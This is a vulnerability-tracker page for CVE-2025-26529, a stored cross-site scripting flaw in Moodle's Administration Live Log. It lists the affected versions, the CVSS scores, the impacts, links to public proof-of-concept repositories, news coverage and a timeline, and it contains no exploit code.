Stored XSS Vulnerability in Moodle's Administration Live Log
CVE-2025-26529

8.3HIGH

Key Information:

Vendor

Moodle Project

Status
Moodle
Vendor
CVE Published:
24 February 2025

Badges

๐Ÿ“ˆ Trended๐Ÿ“ˆ Score: 5,310๐Ÿ‘พ Exploit Exists๐ŸŸก Public PoC๐Ÿ“ฐ News Worthy

What is CVE-2025-26529?

CVE-2025-26529 is a vulnerability found in Moodle's Administration Live Log, a crucial component of the Moodle learning management system used by educational institutions globally to manage and deliver online courses. This vulnerability involves stored cross-site scripting (XSS), which arises from insufficient sanitization of description information displayed in the live log. If exploited, this could negatively impact organizations by allowing attackers to inject malicious scripts that execute in the context of users accessing the log, potentially compromising sensitive data and affecting the integrity of user interactions within Moodle.

Technical Details

This vulnerability is categorized as a stored XSS issue due to a lack of proper sanitization mechanisms in the Administration Live Log feature of Moodle. Attackers can leverage this flaw to embed scripts in the log entries, leading to the execution of those scripts whenever an administrator or authorized user views the logs. The risk increases with the possibility of these scripts being used to execute unauthorized actions or capture user credentials and session tokens.

Potential impact of CVE-2025-26529

  1. User Compromise: Attackers can execute scripts that target usersโ€™ sessions, leading to unauthorized access to accounts and sensitive information. This risk is particularly acute for administrators who have higher access privileges.

  2. Data Integrity Threats: The ability to inject malicious scripts can allow attackers to manipulate log entries and conceal their activities, undermining the integrity and reliability of log data used for monitoring and auditing purposes.

  3. Reputation and Trust Erosion: The exploitation of this vulnerability could lead to significant reputational damage for institutions relying on Moodle for e-learning. Breaches involving sensitive user data can erode trust in the platform's security and prompt users to seek alternatives.

Affected Version(s)

moodle 4.5.0 < 4.5.2

moodle 4.4.0 < 4.4.6

moodle 4.3.0 < 4.3.10

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

UNISA_CVE-2025-26529
Created by exfil0

moodleTestingEnv
Created by NightBloodz

News Articles

favicon imageSnyk

Cross-site Scripting (XSS) in moodle/moodle | CVE-2025-26529 | Snyk

Medium severity (5.8) Cross-site Scripting (XSS) in moodle/moodle | CVE-2025-26529

favicon imageogma.in

Understanding and Mitigating CVE-2025-26529: Stored XSS Risk in Moodle's Admin Live Log

Explore CVE-2025-26529, a critical XSS vulnerability in Moodle's admin live log, and effective measures to mitigate it.

favicon imageDebian Security Tracker

CVE-2025-26529

NameCVE-2025-26529DescriptionDescription information displayed in the site administration live log required additional sanitizing to prevent a stored XSS risk.SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc,...

References

https://moodle.org/mod/forum/discuss.php?d=466145
vendor-advisory
http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=...
patch

CVSS V3.1

Score:
8.3
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
High
Privileges Required:
None
User Interaction:
Required
Scope:
Changed

Timeline

  • ๐Ÿ“ฐ

    First article discovered by Debian Security Tracker

  • ๐Ÿ“ˆ

    Vulnerability started trending

  • ๐ŸŸก

    Public PoC available

  • ๐Ÿ‘พ

    Exploit known to exist

  • Vulnerability published

  • Vulnerability Reserved

.